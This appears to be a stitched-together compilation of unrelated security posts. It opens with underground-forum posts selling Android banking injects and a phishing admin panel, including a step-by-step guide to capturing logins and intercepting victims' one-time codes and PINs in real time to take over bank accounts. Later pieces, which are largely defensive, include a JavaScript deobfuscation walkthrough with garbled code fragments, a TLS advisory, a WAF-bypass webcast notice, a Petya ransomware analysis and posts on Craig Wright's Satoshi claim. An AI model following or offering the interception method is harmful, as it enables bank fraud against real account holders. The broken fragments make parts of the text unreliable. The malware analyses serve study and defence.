
Колонка "Keys" это есть полученные детали для входа.
Колонка "Pin" это для получених тукенов/пинов .
Колонка "Task" для добавленья операции по запросу тукена/пинов .
Колонка "Redirect" показывает релле редиректа конкретной жертвы . Если поставить "On" то жертва будет перенапрвлена на оригинал сразу.

| *Если жертва мегает красним то это значит что жертва какраз ждет от вас комаду

И так , на даном этапе у нас есть логины для входа , и ждущий человвек на нашей странице .
Входим, идем на активацию IBAN . Там нас спрашивает Pin1/Tooken1 .
Мы идем обратно на админку и нажимаем запрос операции. У нас откроется окно с выбором операций .

Нажимаем на "ask Pin1" и жертва видит вот это:
Дальше все просто. Жертва вводить "pin1" и он приходит к нам на админку . А жертва в это время снова видит пред собой заставку "подождите" .
Если пин подошол, идем на перевод и такимже способом просим "pin2". Важно понимать что это все можно повторять много раз и после неверного пина можно снова его запросить .

Если залив ушол , ставим "Redirect" на "On" и юсер уходит на оригинал. Или в продвинутых системах можно показать ему техроботы и попросить зайти попоже.

Вот и все!

**Все тексты на английском по админке написаны с ошибками , я это знаю ).Делал очень быстро . Никак не дойдут руки сделать до конца 

On march 2016 the 9th :

доброе время суток всем.

С великой радостью рад предложить свои услуги по разработке инжектов под мобильные устройства для многих публичных андроид ботов .
Цены зависят от тех заданий .
Пример роботы на один из UK линков можно посмотреть тут 

With great joy, I am pleased to offer its services on developing injects for mobile devices for many public android bots.
The prices depend on those jobs.
An example of one of the injects on the UK link can be found here 
Files mirrored here. (pass: demo)
On march 2016 the 16th:
Ladie's and Gentlemen's.
Don't miss out some fresh and well-designed mobile injects for UK.
9 common links.
Hight % success task.
On march 2016 the 31st:
Доброе время суток всем.
Последним временем много клиентов задают одни и те же вопросы связаны с видео o работе перехвата на Нидерланды.
Я решил более детально описать систему работы и поставить ее где-то в общедоступном месте.
Прежде всего пару строчек хотел бы написать o админ панели. Oна называется Universal Admin. называется она не просто так Универсал,
у нее реализована возможность поддерживать много разных проектов таких как: Tooken intercept,Text manager,Log parser,Drop manager
и многое другое.

[2 images here...not available at dump time]

Не обращайте внимания на разные цвета и стили на Скринах ,стили меняются тоже прямо с админки.

[1 image here...not available at dump time]

Tо есть админ панель одна а плагинов под нее может быть много.Hа видео Вы видели эту админку с плагином Tooken intercept + Text manager.

Text manager-это менеджер текстовых блоков и название кнопок, которые будут автоматически вставляется в вашы страницы,инжекты и
фишинг сраницы.

[1 images here...not available at dump time]

Все что надо сделать для работы это создать текстовый блок с определенным ID ,потом на вашей странице создать элемент с этим же ID и
вставить одну функцию в конец документа.
Для примера: У вас есть инжект в котором есть определенная Легенда запроса дополнительной информации.
Чтобы изменить эту Легенду вам как минимум надо разбираться в HTML и как максимум пересобирать конфигурацию бота.
С помощью текстового менеджера в моей админке все что вам надо это поменять текст в определенном блоке и нажать сохранить.

Tooken intercept- это собственно то о чем мы будем сейчас говорить.
Не важно каким способом Вы стараетесь обмануть жертву (Injec ,phishing page) цель является добытие определенного пакета информации .
Для примера скажем у вас есть Paypal Phishing page с помощью которой вы добывайте username и пароль. эти данные отсылаются куда-то на
админку в нашем случае это Universal Admin.
Username и пароль это и есть тот самый пакет информации который после отправки формы сохраняются у вас ,а кокретно вот тут

[1 image here...not available at dump time]

Использовать эту информацию можно по-разному в зависимости от вашего проекта.
Одним из методов использования этой информации является перехват(intercept) ,то есть использовать информацию в реальном времени прямо сейчас.
Вы перехватили username и пароль и вместо жертвы попадаете на ак ,пока жертва ждет думая что страница грузится.
В случае с PayPal использования перехвата не совсем обязательно, так как полученные пакет информации а именно username и пароль Вы
можете использовать и через неделю. Но в связи с тем что последнее время много контор используют One Time password(Tooken),
которые действительны только 30 секунд, обойтись без Tooken interstep нереально.
Tooken intercept дает вам возможность использовать тот самый пароль(tooken) на протяжении 30 секунд пока жертва ждет загрузки следующей страницы.

Возьмем тот же PayPal. Скажем вы получили только что username и пароль, зашли внутрь, и на главной странице вам выскочила рамочка где
говорится что для подтверждения вашей личности на ваш мобильный телефон был отправлен SMS с коротким кодом(Tooken) код
который надо вести тam же в рамочкe.
Код который был отправлен на мобильный телефон жертвы!!! жертва которая на данный момент находится на вашей странице(Phishing Inject)!!!
там где только что она(жертва) ввела username и пароль, username и пароль те что пришли к вам на админку и те что вы использовали для того
чтобы зайти на тот самый аккаунт где вам выскочила рамочка!!

В стандартных методах это называется запал и етот пакет информации можно выбросить. можно сделать такую же рамочку после логин этапа
для всех юзеров на нашей пишем фишинг или инжекте, но проблема в том что это рамочка показывается не всем и не всегда и если жертве
на телефон ничего не приходило то он туда ничего никогда не ведет.

Я думаю всем понятно что здесь нужна динамическая страница с дистанционным управлением. То есть вы должны принимать решения показывать
рамочку данной жертве или не показывать.

Именно это и есть основа.Страница которая присоединена к нашей админке может меняться исходя из команд которые вы задаете в админке.
Команд может быть много, но для этого в определенном месте в админке для каждой жертвы eсть список команд, которые можно
задать для данной страницы на которой он(жертвa) находится.

[1 image here...not available at dump time]

в нашем примитивном пример из PayPal в списке операции должнa присутствовать кнопка "показать рамочку".
Если вы зашли на аккаунт с только что полученными данными и у вас выкидывает эту рамочку вы нажимаете кнопку "показать рамочку" для данной жертвой.
И у нее на экране покажет такую же рамочку.
Tooken, который будет введён в эту рамочку прилетит к вам на админ туда же где лежат username и пароль от этой жертвы.
Думаю здесь все понятно.
Единственное что хотел бы подчеркнуть то что жертва в любой момент может закрыть страницу закрыть компьютер вырубить сеть.
В таком случае связь страницы с админкой теряется и задавать команды для данной страницы не имеет смысла.
Для этого в нашей админке есть Tracker онлайн статуса который позволяет нам следить находится ли жертва онлайн или нет. 

[1 image here...not available at dump time]

Теперь структура Tooken intercept админки.
Первая страница это главная страница где показана текучка всех посетителей(жертв) ваших инжектов и фишингов.
Напротив каждого посетителя есть кнопка O-Panel при нажатии на которую вы попадаете уже на индивидуальную панель операций для данного посетителя.

[1 image here...not available at dump time]

Именно здесь и находится список операций.
Именно здесь крупным планом видно онлайн статус. Прошу заметить что онлайн статусов бывает 3(ONLINE, OFFLINE и WAITING).
WAITING статус светится красным и светится только тогда когда жертва ждет операции от вас ,то есть только что вам был отправлен
пакет информации и страница ждет дальнейших инструкций!.

[1 image here...not available at dump time]

Также жертва с этим статусом мигает красным и на главной странице что поднимает их в таблице вверх.

Окей давайте теперь возьмем реальный пример Phishing страницы скажем одного из нидерландских банков. тут реализованные как PC
так и мобильная версия.

[1 image here...not available at dump time]

Вы делаете рассылку на email и линки могут открываться на мобильном. в основном 50% так и происходит.
Скажем кто-то(жертвa) переходит на Линк в вашем email и попадает на нашу страницу. Вы об этом узнаете сразу через Jabber Alert,
в котором будет говориться про нового посетителя.
Самое время открыть Universal панель. там вы увидите Новую колонку с информацией про посетителя а Конкретно его айпи ширина
экрана и многое другое

[1 image here...not available at dump time]

с минуты на минуту к нам прилетят логины, их можно ждать как на главной так и на O-Panel.

после того как Вы получили логины, Посетитель уходит в режим ожидания. об этом Вам будут говорить красные мигающие панели,
она экранe у жертвы будет примерно такое
[1 image here...not available at dump time]
Что делать вам с полученным пакетом Логинов Решать только Вам. Но если у вас, находясь внутри в аккаунте, попросят ввести
tooken, пароль, SMS пароль то самое время вернуться на O-Panel и нажать соответствующую команду.
Команда которая приведет к тому что страница на которой находится жертва покажет ему запрос того что вам надо.

[1 image here...not available at dump time]

После того как жертва ввела в форму Tooken ,она снова уходит в режим ожидания, и Вы снова должны определиться что делать и
какую команду ему дать. И так до бесконечности или пока жертва не Закроет страницу. Но если все-таки это надоест вам то у вас
есть два варианта распрощаться жертвой.

это поставить блок

[1 image here...not available at dump time]

или перенаправить его на оригинал страницу.

[1 image here...not available at dump time]

При работе с одним посетителем могут стучать другие новые.
Это будет отвлекать и все новые посетители будут ждать. чтобы этого избежать на главной странице есть ричашки которые контролируют
регистрацию новых посетителей и переадресацию старых поголовно.

Если поставить регистрацию OFF ,то в админке только будут работать Те кто уже Там есть, все новые будут попадать на оригинал страницы контор.
A если поставить редирект всех ,то все посетители(жертвы) кто есть в админке будут перенаправлены на свои оригинальные страницы поголовно.
Это надо делать когда вы собрались к примеру уходить.

On april 2016 the 4th:
увжаемые друзья

новые инжекты под Андроид

On april 2016 the 11th:
Продается Пак инжектов под андроид для сбора карт.



user posted image

Обезательно посмотрите видео. В инжектах реализованы Responsive & animations приемы.
File mirrored here (pass : 1qaz)
On april 2016 the 12th:
Pack of Injects for Columbia banks for sale.
Credit cards colectors with admin panel on https domen.



[3 images here...not available at dump time]

Video: [Redacted]
File mirrored here  (pass: columbia)
On april 2016 the 14th:
Pack of Injects for Canada banks for sale.
Credit cards colectors with admin panel on https domen.



[3 images here...not available at dump time]

Video: [Redacted]
File mirrored here (pass: canada)
On april 2016 the 18th:
Недавно вышел апдейт на U-admin(Universal Admin).

Теперь все более соответствует написанному выше описанием.
Админ панель теперь имеют специальную директорию под plugins, и все плагины в этой директории автоматически прописывается в админке.
[1 image here...not available at dump time]
Например, вы приобрели U-admin а потом "Log parser Plugin". Для этого вам просто надо поставить папку Log parser в плагин директорию в админке.

Также был разработан VNC плагин который дает возможность коннектится к вашему botnet API с запросом на соединение по VNC/SOCKS для определенного бота.
Этот плагин является дополнением к "Tooken Intercept" плагина про который я писал вам выше. Если вы используете "Tooken Intercept" с инжектором
и в вашем боте есть в VNC, и в админке вашего Бота есть API управление VNC то при наличии VLC plugin в U-admin возможно сделать запрос на соединение по vnc или socks с ботом.
Как правило это делается автоматически при самом первом соединение с инжектоm,то есть когда жертва заходит на страницу перехвата.

В связи с этим была слегка переделана O-Panel где в команды была добавлена новая опция проверки статуса VNC/SOCKS соединение.
[1 image here...not available at dump time]
Куда ,как вы видите, при успешном соединении выводятся данные на VNC/SOCKS

File Tree from some components :
Folder PATH listing
|   cp.php
|   head.php
|   index.php
|   login.php
|   session.php
|   |   animate.css
|   |   bootbox.min.js
|   |   bootstrap-notify.min.js
|   |   bootstrap-social.css
|   |   hover-min.css
|   |   index.php
|   |   jquery-ui.css
|   |   jquery-ui.min.js
|   |   jquery.js
|   |   my.css
|   |  
|   +---bootstrap
|   |   +---css
|   |   |       bootstrap-theme.css
|   |   |
|   |   |       bootstrap-theme.min.css
|   |   |
|   |   |       bootstrap.css
|   |   |
|   |   |       bootstrap.min.css
|   |   |
|   |   |      
|   |   +---fonts
|   |   |       glyphicons-halflings-regular.eot
|   |   |       glyphicons-halflings-regular.svg
|   |   |       glyphicons-halflings-regular.ttf
|   |   |       glyphicons-halflings-regular.woff
|   |   |       glyphicons-halflings-regular.woff2
|   |   |      
|   |   +---js
|   |   |       bootstrap.js
|   |   |       bootstrap.min.js
|   |   |       npm.js
|   |   |      
|   |   \---switch
|   |           bootstrap-switch.min.css
|   |           bootstrap-switch.min.js
|   |          
|   +---dt
|   |       dataTables.bootstrap.min.css
|   |       dataTables.bootstrap.min.js
|   |       jquery.dataTables.min.js
|   |      
|   \---images
|           ui-icons_444444_256x240.png
|           ui-icons_555555_256x240.png
|           ui-icons_777620_256x240.png
|           ui-icons_777777_256x240.png
|           ui-icons_cc0000_256x240.png
|           ui-icons_ffffff_256x240.png
|       geo_switch.txt
|       index.php
|       theme.txt
|   +---intercept
|   |   |   bc.php
|   |   |   class.jabber.php
|   |   |   dynamic__part.php
|   |   |   functions.php
|   |   |   gate.php
|   |   |   head.php
|   |   |   index.php
|   |   |   main.php
|   |   |   panel.php
|   |   |   text.php
|   |   |  
|   |   +---ajax
|   |   |       cp_ajax.php
|   |   |       index.php
|   |   |      
|   |   +---files
|   |   |   |   animate.css
|   |   |   |   bootbox.min.js
|   |   |   |   bootstrap-notify.min.js
|   |   |   |   bootstrap-social.css
|   |   |   |   hover-min.css
|   |   |   |   index.php
|   |   |   |   jquery-ui.css
|   |   |   |   jquery-ui.min.js
|   |   |   |   jquery.js
|   |   |   |   my.css
|   |   |   |  
|   |   |   +---bootstrap
|   |   |   |   +---css
|   |   |   |   |       bootstrap-theme.css
|   |   |   |   |
|   |   |   |   |       bootstrap-theme.min.css
|   |   |   |   |
|   |   |   |   |       bootstrap.css
|   |   |   |   |
|   |   |   |   |       bootstrap.min.css
|   |   |   |   |
|   |   |   |   |      
|   |   |   |   +---fonts
|   |   |   |   |       glyphicons-halflings-regular.eot
|   |   |   |   |       glyphicons-halflings-regular.svg
|   |   |   |   |       glyphicons-halflings-regular.ttf
|   |   |   |   |       glyphicons-halflings-regular.woff
|   |   |   |   |       glyphicons-halflings-regular.woff2
|   |   |   |   |      
|   |   |   |   +---js
|   |   |   |   |       bootstrap.js
|   |   |   |   |       bootstrap.min.js
|   |   |   |   |       npm.js
|   |   |   |   |      
|   |   |   |   \---switch
|   |   |   |           bootstrap-switch.min.css
|   |   |   |           bootstrap-switch.min.js
|   |   |   |          
|   |   |   +---dt
|   |   |   |       dataTables.bootstrap.min.css
|   |   |   |       dataTables.bootstrap.min.js
|   |   |   |       jquery.dataTables.min.js
|   |   |   |      
|   |   |   \---images
|   |   |           ui-icons_444444_256x240.png
|   |   |           ui-icons_555555_256x240.png
|   |   |           ui-icons_777620_256x240.png
|   |   |           ui-icons_777777_256x240.png
|   |   |           ui-icons_cc0000_256x240.png
|   |   |           ui-icons_ffffff_256x240.png
|   |   |          
|   |   \---public
|   |           .ht.db
|   |           index.php
|   |           Removed.txt
|   |          
|   +---log_parser
|   |   |   functions.php
|   |   |   gate.php
|   |   |   head.php
|   |   |   index.php
|   |   |   main.php
|   |   |  
|   |   +---ajax
|   |   |       server_side.php
|   |   |       ssp.class.php
|   |   |      
|   |   +---classes
|   |   |       browser.php
|   |   |      
|   |   +---files
|   |   |   |   animate.css
|   |   |   |   bootbox.min.js
|   |   |   |   bootstrap-notify.min.js
|   |   |   |   bootstrap-social.css
|   |   |   |   hover-min.css
|   |   |   |   jquery-ui.min.js
|   |   |   |   jquery.js
|   |   |   |   my.css
|   |   |   |  
|   |   |   +---bootstrap
|   |   |   |   +---css
|   |   |   |   |       bootstrap-theme.css
|   |   |   |   |
|   |   |   |   |       bootstrap-theme.min.css
|   |   |   |   |
|   |   |   |   |       bootstrap.css
|   |   |   |   |
|   |   |   |   |       bootstrap.min.css
|   |   |   |   |
|   |   |   |   |      
|   |   |   |   +---fonts
|   |   |   |   |       glyphicons-halflings-regular.eot
|   |   |   |   |       glyphicons-halflings-regular.svg
|   |   |   |   |       glyphicons-halflings-regular.ttf
|   |   |   |   |       glyphicons-halflings-regular.woff
|   |   |   |   |       glyphicons-halflings-regular.woff2
|   |   |   |   |      
|   |   |   |   +---js
|   |   |   |   |       bootstrap.js
|   |   |   |   |       bootstrap.min.js
|   |   |   |   |       npm.js
|   |   |   |   |      
|   |   |   |   \---switch
|   |   |   |           bootstrap-switch.min.css
|   |   |   |           bootstrap-switch.min.js
|   |   |   |          
|   |   |   \---dt
|   |   |           dataTables.bootstrap.min.css
|   |   |           dataTables.bootstrap.min.js
|   |   |           jquery.dataTables.min.js
|   |   |          
|   |   \---public
|   |           .htBd.db
|   |           geo_switch.txt
|   |           index.php
|   |           theme.txt
|   |          
|   +---settings
|   |   |   functions.php
|   |   |   index.php
|   |   |   main.php
|   |   |  
|   |   \---public
|   |           cfg.php
|   |           index.php
|   |          
|   +---style
|   |   |   functions.php
|   |   |   index.php
|   |   |   main.php
|   |   |  
|   |   \---public
|   |           index.php
|   |          
|   \---text
|       |   functions.php
|       |   main.php
|       |   text.php
|       |  
|       \---public
|               index.php
|               texts.txt

Note: If you are interested by the [Redacted] part please send a mail

Read My Lips: Let’s Kill 0Day

0day is cool.  Killing 0day, sight unseen, at scale — that’s cooler.

If you agree with me, you might be my kind of defender, and the upcoming O’Reilly Security Conference(s) might be your kind of cons.

Don’t get me wrong.  Offense is critical.  Defense without Offense is after all just Compliance.  But Defense could use a home.  The Blue Team does not always have to be the away team.

So for quite some time, I’ve been asking Tim O’Reilly to throw a highly technical defensive security event.  Well, be careful what you wish for.  I actually keynoted his Velocity event with Zane Lackey a while back, and was struck by the openness of the environment, and the technical competence of the attendees.  This is a thing that would be good for Defense, and so I’ve taken the rare step of actually joining the Program Committee for this one,  CFP’s for NYC & Amsterdam are still open (but not for much longer!).  How would you know if this is your sort of party?

NIST’s SAMATE project has been assembling this enormous collection of minimized vulnerability cases.  They’re just trying to feed static analyzers, but if you’re filled with ideas of what else is possible with these terabytes of goodies – this is your con.

Researchers at Stanford instrumented the IDE’s of students, and watched how early failures predicted later ones.  Can we predict the future authorship of security vulnerabilities?  In what ways do languages themselves predict failures, independent of authors?  If this interests you, this is your con.

If you’re in operations, don’t feel left out.  You’re actually under attack, and you’re actively doing things to keep the lights on.  We want to know how you’re fighting off the hordes.

We live in a golden age of compilers actually trying to help us (this was not always the case).  Technologies like Address Sanitizer, Undefined Behavior Sanitizer, Stack Protection / /GS along with the Microsoft universe of Control Flow Guard and the post-Boehm-ish MemGC suggest a future of much faster bug discovery and much better runtime protections.  Think you’ve got better?  Think you can measure better?  Cool, show us.

Or show us we’re wrong.  Offensive researchers, there are better places for you to demonstrate the TLS attack of the hour, but if you haven’t noticed, a lot of defensive techniques have gotten a “free pass”, E for effort, that sort of thing.  There’s a reason we call ‘em sandboxes; they’re things kids step into and out of pretty freely.  Mitigations not living up to their hype?  Security technologies actually hosting insecurity?  Talk to a bunch of people who’d care.

We’re not going to fix the world just by blowing things up.  Come, show us your most devious hacks, let’s redefine how we’re going to defend and fix the Internet.

Excellent Manual Javascript Deobfuscation Walk through

Security Researcher Aditya K Sood posted an excellent walk through of manual Javascript Obfuscation on his log, Malware At Stake (

Saturday, April 7, 2012

JavaScript Obfuscation - Manual Armor (1)

Recently, we came across a similar set of obfuscated JavaScripts that are being used continuously in conjunction with automate Browser Exploits Packs (BEPs) such as BlackHole etc. There are several variations of this type of obfuscated JavaScript. Our team prefer to do obfuscation manually because sometimes automated tools are not good enough to perform the deobfuscation. In this post, we are going to discuss about the methodology that  we prefer to follow at SecNiche labs. Let's take a look at the obfuscated JavaScript shown below

The methodology  goes like this:

Step1: Beautify Your JavaScript: 
The very first (basic) step is to beautify the obfuscated JavaScript. For analysis perspective, beautifying the
code such as appropriate indentation makes it very easy to decipher the initial structures in the JavaScript. 
Always do this step before proceeding further.

Step 2: Divide and Rule
This strategy works perfectly fine while analyzing obfuscated JavaScripts. The motive behind this step is to a
analyze the code in small snippet for better grasp.

Applying step 1 and step 2 to the given JavaScript code,  we get part 1 of the code as follows

and part 2 of the code as follows

In part 2, to interpret the given code as single string , one has to use characters ["" +]. Even for doing 
automated analysis, these parameters are required to be tuned so that appropriate interpretation of the string 
can be done. Check the string passed to variable "n".

Step 3: Extract the Logic 
On the modular code (divided code snippets), try to apply the logic step by step (top to bottom). When we
compute the value of "h" we get : h=-2*Math.log(Math.E);   //     h = -2      //

The next logic is to compute the value of "n" first. We have the n="[string]".split("a"), which means we have 
to split the string. By default, split function actually dissects the string n by a delimiter ",". We tweak the code
a bit as presented below:

On executing this code in JavaScript interpreter we get the output as follows,

At this point, we successfully unwraps some part of code by having the value of h and n. Now, we have to 
dissect the loop present in the part 2 as follows

for(i=0;-n.length<-i br="" i="">        {


To compute the code finally, we need to unwrap the logic used in the loop. Step 4 involves the automation of 
the code.

Step4: Automating the Process - Python
In step 4, we need to automate the process to get the next value of the string. On understanding the logic, we
write a following python script to compute the loop

The code actually multiply the every single value by 2 and build up the new string. So, we are almost at the 
end. So we need to build up the final code as presented below

So here we have the final script as follows
A good methodology always  helps to attain the target.

3155527 – Update to Cipher Suites for FalseStart – Version: 1.0

Revision Note: V1.0 (May 10, 2016): Advisory published.
Summary: FalseStart allows the TLS client to send application data before receiving and verifying the server Finished message. This allows an attacker to launch a man-in-the-middle (MiTM) attack to force the TLS client to encrypt the first flight of application_data records using the attacker’s chosen cipher suite from the client’s list. To avoid downgrade attacks, TLS clients only allow FalseStart when their strongest cipher suites are negotiated.

Bypassing Modern WAF’s Exemplified At XSS (Webcast)

Past Saturday, I conducted a "Webcast" on "Garage4hackers" on one of my favorite subjects in the field of Information Security i.e. "WAF Bypass". Initially, i had decided to present something on the topic of "Mobile Browser Security" due to the fact that this has been a topic I have been recently conducting a research on.

However i later realized that the "TakeAways" would not be much helpful, therefore i decided to talk about something that Bughunters/Pentesters can use in their day to day pentests and security engagements and hence i decided to present on this topic.

I must admit that the response has been overwhelming along with it, i have also managed to get a chance to learn more from the feedback and CTF responses.

I would like to specially thank "Imdadullah", "Himanshu", "Sandeep"  along with other garage4hackers members for inviting/supporting me through out the journey.  One of the best things "G4H Community" is the work they are doing for the security community by conducting free of cost Webcasts. You can find a list of other Webcasts here - ""


It is known that over the years, a trend that addresses the information security landscape has emerged, I mean, web applications are under attack, given this perspective, Web Application Firewalls are becoming increasingly popular, which are most commonly used by organizations to protect against various attacks such as SQL Injection, XSS etc.

While WAF's may help preventing application layer attacks up to some extent, however they certainly are not replacements for input validation and secure coding practices due to the fact that they are based upon Blacklists which means rejection of known patterns while allowing everything else. The problem, especially in case of JavaScript is that it's simply not possible to create blacklists capable of blocking all patterns without having to generate false positives due to the dynamic nature of javaScript and infinite ways of obfuscating the payload.

In this webinar, the we will talk about various techniques that can be used to bypass WAF"s such as Brute Forcing, Regular expression reversing and browser bugs. The webinar would mostly discuss


- Basic knowledge about HTML/JavaScript

- Basic know how about XSS attacks



CTF Competition

After the webinar, we had this "CTF" challenge made up by a friend of mine "FileDescriptor", certain parts the first two challenges are based upon characteristics of a real world WAF that I encountered in wild which was combined with FD's ideas to make up the challenge . The last challenge is based upon "@FileDescriptor" unqiue idea and hence, it's not easy to crack and hence we named it as "Hard".

CTF Link :

The Cryptographically Provable Con Man

It’s not actually surprising that somebody would claim to be the creator of Bitcoin.  Whoever “Satoshi Nakamoto” is, is worth several hundred million dollars.  What is surprising is that credible people were backing Craig Wright’s increasingly bizarre claims.  I could speculate why, or I could just ask.  So I mailed Gavin Andresen, Chief Scientist of the Bitcoin Foundation, “What the heck?”:

What is going on here?

There’s clear unambiguous cryptographic evidence of fraud and you’re lending credibility to the idea that a public key operation could should or must remain private?

He replied as follows, quoted with permission:

Yeah, what the heck?

I was as surprised by the ‘proof’ as anyone, and don’t yet know exactly what is going on.

It was a mistake to agree to publish my post before I saw his– I assumed his post would simply be a signed message anybody could easily verify.

And it was probably a mistake to even start to play the Find Satoshi game, but I DO feel grateful to Satoshi.

If I’m lending credibility to the idea that a public key operation should remain private, that is entirely accidental. OF COURSE he should just publish a signed message or (equivalently) move some btc through the key associated with an early block.

Feel free to quote or republish this email.

Good on Gavin for his entirely reasonable reaction to this genuinely strange situation.

Craig Wright seems to be doubling down on his fraud, again, and I don’t care.  The guy took an old Satoshi signature from 2009 and pretended it was fresh and new and applied to Sartre.  It’s like Wright took the final page of a signed contract and stapled it to something else, then proclaimed to the world “See?  I signed it!”.

That’s not how it works.

Say what you will about Bitcoin, it’s given us the world’s first cryptographically provable con artist.  Scammers always have more to say, but all that matters now is math.  He can actually sign “Craig Wright is Satoshi Nakamoto” with Satoshi’s keys, openly and publicly.  Or he can’t, because he doesn’t have those keys, because he’s not actually Satoshi.

A Glimpse at Petya Ransomware

Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them.

Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but to pay for the ransom, and it will encrypt filesystem’s Master File Table, which leaves the operating system unable to load. MFT is an essential file in NTFS file system. It contains every file record and directory on NTFS logical volume. Each record contains all the particulars that the operating system need to boot properly.

Like any other malware, Petya is widely distributed via a job application spear-phishing email that comes with a Dropbox link luring the victim by claiming the link contains self-extracting CV; in fact, it contains self-extracting executable that would later unleash its malicious behavior.

Petya dropper

Petya’s dropper

Petya's infection behavior

Petya’s infection behavior

 Petya ransomware has two infection stages. The first stage is MBR infection and encryption key generation, including the decryption code used in ransom messages. The second stage is MFT encryption.

First Stage of Encryption

First infection stage behavior

First infection stage behavior

An MBR infection is made through straightforward \\.\PhysicalDrive0 manipulation with the help of DeviceIOControl API. It first retrieves the physical location of the root drive \\.\c by sending IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code to the device driver.  Then it sends the extended disk partition info of \\.\PhysicalDrive0 through IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code.


The dropper will encrypt the original MBR using XOR opcode and 0x37 and save it for later use. It will also create 34 disk sectors containing 0x37. Right after the 34 sectors are Petya’s MFT infecting code. Located on Sector 56 is the original encrypted MBR.

Infected disk view

Infected disk view

Infected disk view

Infected disk view

Original Encrypted MBR

Original Encrypted MBR

After the MBR infection, it will intentionally crash the system by triggering NTRaiseHardError. This will trigger BSOD and the system will start, which will cause the machine to load using the infected MBR.

Code snippet triggering BSOD

Code snippet in triggering BSOD



Once we inspected the dumped image of the disk, we discovered it was showing a fake CHKDSK screen. We will also see the ransom message and ASCII skull art.

Dumped disk image

Dumped disk image

Second Infection Stage

The stage 2 infection code is written in 16-bit architecture, which uses BIOS interrupt calls.

Upon system boot up, it will load into memory Petya’s malicious code, which is located at sector 34. It will first determine if the system is already infected by checking the first byte at sector is 0x0. If not infected, it will display fake CHKDSK.



When someone sees the Figure 8, it means that the MFT table is already encrypted using salsa20 algorithm.

Figure 8

The victim will see this screen upon boot.

The victim will see this screen upon boot.

Ransom message and instructions

Ransom message and instructions

Petya Ransomware Page

The webpage for the victim to access their personal decryption key is protected against bots and contains information about when the Petya ransomware project was launched, warnings on what not to do when recovering files and an FAQ page. The page is surprisingly very user friendly and shows the days left before the ransom price will be doubled.

Ransom page captcha

Ransom page captcha

 Petya’s homepage

Petya’s homepage

It also contains news feeds, including different blogs and news from AV companies warning about Petya.

News 1 Figure 13

News 2

They also provide a step-by-step process on how to pay the ransom, including instructions on how to purchase bitcoin. Support via web is included too in case the victim encounters problems in the transaction they’ve made. Petya’s ransom is a lot cheaper compared to other ransomware, too.

Petya web page 1

Petya web page 2

Petya web page 3

Petya web page 4

On Step 4 of the payment procedure, the “next” button is disabled until they’ve confirmed that they already received the payment.

Petya support page

Petya’s support page

Below is a shot of ThreatTrack’s ThreatSecure Network dashboard catching Petya. Tools like ThreatSecure can detect and disrupt attacks in real time.

ThreatSecure Network catching Petya ransomware

ThreatSecure Network catching Petya ransomware


The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

A Decade of Exploit Database Data

Managing the Exploit Database is one of those ongoing tasks that ends up taking a significant amount of time and often, we don't take the time to step back and look at the trends as they occur over time. Have there been more exploits over the years? Perhaps fewer? Is there a shift in platforms being targeted? Has the bar for exploits indeed been raised with the increase in more secure operating system protections?

Validating Satoshi (Or Not)


  1. Yes, this is a scam.  Not maybe.  Not possibly.
  2. Wright is pretending he has Satoshi’s signature on Sartre’s writing.  That would mean he has the private key, and is likely to be Satoshi.  What he actually has is Satoshi’s signature on parts of the public Blockchain, which of course means he doesn’t need the private key and he doesn’t  need to be Satoshi.  He just needs to make you think Satoshi signed something else besides the Blockchain — like Sartre.  He doesn’t publish Sartre.  He publishes 14% of one document.  He then shows you a hash that’s supposed to summarize the entire document.  This is a lie.  It’s a hash extracted from the Blockchain itself.  Ryan Castellucci (my engineer at White Ops and master of Bitcoin Fu) put an extractor here.  Of course the Blockchain is totally public and of course has signatures from Satoshi, so Wright being able to lift a signature from here isn’t surprising at all.
  3. He probably would have gotten away with it if the signature itself wasn’t googlable by Redditors.
  4. I think Gavin et al are victims of another scam, and Wright’s done classic misdirection by generating different scams for different audiences.


UPDATE:  This signature does actually validate, you just have to use a different version of OpenSSL than I did originally.


Of course, if this is the signature that already went out with that block, it doesn’t matter.  So I’m looking into that right now.

Update 2:

OK, yes, this is intentional scammery.  This is the 2009 transaction.  See this:


And then, that hex is of course this hex, as in the zip below:


Of course that’s exactly what Uptrenda on Reddit posted.  Gotta give Wright very small props, that’s a mildly clever replay attack, foiled by total lack of QA.


So Craig Wright is claiming to be Satoshi, and importantly, Gavin Andreson believes him.  I say importantly because normally I wouldn’t even give this document a second thought, it’s obviously scam style.  But Gavin.  Yet, the procedure that’s supposed to prove Dr. Wright is Satoshi is aggressively, almost-but-not-quite maliciously resistant to actual validation.  OK, anyone can take screenshots of their terminal, but sha256sums of everything but the one file you actually would like a hash of?  More importantly, lots of discussion of how cryptography works, but not why we should consider this particular public key interesting.

But it could actually be interesting.  This public key claimed is indeed from a very early block, which was the constraint I myself declared.

But for those with an open mind, moving a few chunks of the so-called “bitcoin billion” should be proof enough, says Dan Kaminsky, a well-known security researcher with a history of bitcoin analysis. Even the theory that Wright might have somehow hacked Nakamoto’s computer hardly discounts that proof, Kaminsky argues. “Every computer can be hacked. But if he hacked Satoshi, then this guy knew who the real Satoshi was, and that’s more than what the rest of us can say,” Kaminsky points out. “If Wright does a transaction with one of these keys, he’s done something no other wannabe-Satoshi has done, and we should recognize that.”

OK, it’s not a key attached to the Bitcoin billion, but Block 9 is close enough for me.  The bigger issue is that I can’t actually get the process to yield a valid signature.  I’ve gone over the data a few times, and the signature isn’t actually validating.  I’m not going to read too much into this because Dr. Wright didn’t actually post an OpenSSL version, and who knows if something changed.  But it is important to realize — anyone can claim a public key, that’s why they’re called public keys.  The signature actually does need to validate and I haven’t gotten it to work.2016-05-02_02h15_23.png

I could have missed something, it’s pretty late.  So here’s the binary blobs — nobody should have to try to hand transcribe and validate hex like this.  If I had to speculate, it’s just some serious fat fingering, where the signature is actually across some other message (like that Sartre text we see 14% of).  Alternate explanations have to be … unlikely.